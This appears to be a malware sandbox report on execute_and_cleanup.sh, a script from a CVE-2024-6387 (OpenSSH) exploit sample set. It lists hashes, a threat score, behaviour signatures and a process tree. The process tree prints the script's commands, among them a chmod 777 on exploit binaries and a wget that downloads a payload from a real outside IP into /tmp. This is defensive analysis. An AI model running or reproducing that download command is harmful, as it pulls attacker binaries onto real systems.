Overview

overview

7

Static

static

1

cve_2024_6387/386

ubuntu-24.04-amd64

7

cve_2024_6387/aarch64

ubuntu-22.04-amd64

7

cve_2024_6387/amd64

ubuntu-20.04-amd64

7

cve_2024_6387/arm5

debian-9-armhf

7

cve_2024_6387/arm6

debian-12-armhf

7

cve_2024_6387/arm7

debian-12-armhf

7

cve_2024_6...nup.sh

ubuntu-18.04-amd64

7

cve_2024_6...nup.sh

debian-9-armhf

7

cve_2024_6...nup.sh

debian-9-mips

7

cve_2024_6...nup.sh

debian-9-mipsel

7

cve_2024_6387/exploit

ubuntu-18.04-amd64

7

cve_2024_6...oit.py

windows7-x64

3

cve_2024_6...oit.py

windows10-2004-x64

3

cve_2024_6387/mips

debian-9-mips

3

cve_2024_6387/mips64

debian-9-mips

cve_2024_6...ps64el

debian-9-mipsel

cve_2024_6387/mipsel

debian-9-mipsel

3

Analysis

  • max time kernel
    133s
  • max time network
    188s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    23-11-2024 18:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cve_2024_6387/execute_and_cleanup.sh

  • Size

    926B

  • MD5

    1f452448cea986aedc88ba50d48691f7

  • SHA1

    98cee6d3b4a210be77fa4a458b06b805fa781bd7

  • SHA256

    67564d4a3ad079b6ec430193d5a60ce67df4d13409387fd074fd10d921fda20e

  • SHA512

    e11bb1ee0a50674550e3710c0e9670d2fe15b53f450bbc54d5dcc511999114f5e21aa0ee396c6b2e9e85fd2afe9078ca16b128e563f2b8acb9167d693e63183a

Score
7/10
defense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/cve_2024_6387/execute_and_cleanup.sh
    /tmp/cve_2024_6387/execute_and_cleanup.sh
    1⤵
      PID:715
      • /bin/mkdir
        mkdir -p /tmp/downloads
        2⤵
        • Reads runtime system information
        PID:718
      • /bin/chmod
        chmod 777 386 aarch64 amd64 arm5 arm6 arm7 c.txt 验证利用脚本.txt execute_and_cleanup.sh exploit exploit.py ip.txt mips mips64 mips64el mipsel
        2⤵
        • File and Directory Permissions Modification
        PID:719
      • /usr/bin/wget
        wget http://108.174.58.28/386 -O /tmp/downloads/386
        2⤵
        • Writes file to tmp directory
        PID:720

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads